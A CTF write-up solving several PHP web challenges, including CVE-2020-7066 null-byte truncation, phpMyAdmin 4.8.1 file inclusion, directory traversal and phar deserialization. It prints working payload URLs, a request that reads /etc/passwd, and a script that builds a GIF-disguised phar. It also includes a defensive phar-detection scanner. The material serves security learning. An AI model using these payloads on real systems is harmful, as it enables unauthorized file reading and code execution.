BuuCTF Web Writeup Part 3

Date: 2020-08-02 11:13:15


[GKCTF2020] cve版签到 (CVE-edition sign-in)

Challenge hints

cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com 

Challenge origin

#79329 get_headers() silently truncates after a null byte

This was tested on PHP 7.3, but the function has always had this bug.

The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.

Solution

?url=http://127.0.0.123%00.ctfhub.com

Information gathering

Make good use of the PHP bug tracker when searching for vulnerabilities.

(Unfinished) [安洵杯 2019] easy_web

[GWCTF 2019] 我有一个数据库 (I have a database)

Solution

Scanning reveals /phpmyadmin/; visiting it shows the version is 4.8.1.

phpMyAdmin 4.8.1 has a file inclusion vulnerability; construct ?target=db_datadict.php%253f/../../../../../../../../../flag

(Unfinished) [BJDCTF2020] Mark loves cat

(Unfinished) [CISCN2019 华北赛区 Day1 Web1] Dropbox

Upload testing shows that only image-type files can be uploaded.

Intercept the download request

POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png

After forwarding the request, the file contents are displayed.

Directory traversal

filename=../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

Main files in the challenge

.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php

class.php is the core file.

class.php (simplified)

<?php

class User {
    public $db;

    // Runs when the object is destroyed; calls close() on whatever $db holds
    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    // Any undefined method call is forwarded to every File object in $files
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        ...
        echo $table; // renders the collected results as an HTML table
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    // Reads the file through any PHP stream wrapper, including phar://
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

The close() method of the File class is where the RCE vulnerability lies.

Q: How can the RCE vulnerability be exploited?

The code never calls unserialize(), but there is a file upload point.

Attacking a PHP Deserialization Vulnerability via Phar

The Phar File Structure

0x00 A Stub

It can be thought of as a marker; the format is xxx<?php xxx; __HALT_COMPILER();?>. The content before it is not restricted, but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize the file as a phar file.

0x01 A Manifest Describing the Contents

A phar file is essentially a compressed archive; the manifest records the permissions, attributes and other information of each compressed file. This section also stores user-defined meta-data in serialized form, which is the core of the attack described above.

0x02 The File Contents

It is the contents of the compressed files.

0x03 A signature for verifying Phar integrity

(phar file format only)

Demo

Construct a phar file according to the structure above; PHP has a built-in Phar class for the related operations.

Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.

<?php
// Minimal stand-in for the demo's payload class so the script runs on its own
// (this is not the challenge's File class from class.php)
class file {
    public $output;
}

@unlink("phar.phar");
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o); // store custom meta-data in manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering(); // automatic computation of signature
?>
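Added example, not from the original writeup: a defender-side upload scanner in Python that walks the phar layout described above (stub ending in __HALT_COMPILER();, then the manifest carrying serialized meta-data) to detect a phar polyglot regardless of its extension or leading magic bytes. The phar bytes it checks are constructed inline following the same layout, and the names build_phar and find_phar_metadata are my own.

```python
import hashlib
import struct
import zlib

HALT = b"__HALT_COMPILER();"

def build_phar(stub_prefix: bytes, metadata: bytes, name: bytes, data: bytes) -> bytes:
    """Constructed sample: a one-file phar laid out as stub, manifest (with serialized
    meta-data), file contents and SHA-1 signature. Only used as realistic scanner input."""
    stub = stub_prefix + HALT + b" ?>\r\n"
    entry = (struct.pack("<I", len(name)) + name
             + struct.pack("<IIIIII", len(data), 0, len(data), zlib.crc32(data), 0, 0))
    body = (struct.pack("<IHII", 1, 0x1100, 0, 0)  # file count, API version, flags, alias length
            + struct.pack("<I", len(metadata)) + metadata + entry)
    payload = stub + struct.pack("<I", len(body)) + body + data
    return payload + hashlib.sha1(payload).digest() + struct.pack("<I", 2) + b"GBMB"

def find_phar_metadata(blob: bytes):
    """Return the serialized meta-data from a phar manifest, or None if the blob is not
    a phar. A GIF89a header or a .png name does not matter: only the stub marker does."""
    pos = blob.find(HALT)
    if pos < 0:
        return None
    pos += len(HALT)
    # the phar reader tolerates an optional " ?>" and a newline after the halt token
    if blob[pos:pos + 1] == b" ":
        pos += 1
    if blob[pos:pos + 2] == b"?>":
        pos += 2
    if blob[pos:pos + 2] == b"\r\n":
        pos += 2
    elif blob[pos:pos + 1] == b"\n":
        pos += 1
    if len(blob) < pos + 18:
        return None
    manifest_len, _count, _api, _flags, alias_len = struct.unpack_from("<IIHII", blob, pos)
    pos += 18 + alias_len
    if len(blob) < pos + 4:
        return None
    (meta_len,) = struct.unpack_from("<I", blob, pos)
    if meta_len > manifest_len or len(blob) < pos + 4 + meta_len:
        return None
    return blob[pos + 4:pos + 4 + meta_len]

# constructed "image" upload that is really a phar, mirroring the demo above
SAMPLE = build_phar(b"GIF89a", b'O:4:"file":1:{s:6:"output";s:10:"phpinfo();";}', b"test.txt", b"test")

def is_phar_polyglot(blob: bytes) -> bool:
    return find_phar_metadata(blob) is not None
```

Rejecting uploads for which is_phar_polyglot() is true, together with stream_wrapper_unregister('phar') on the server, removes the trigger that close() above would otherwise hand to file_get_contents().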
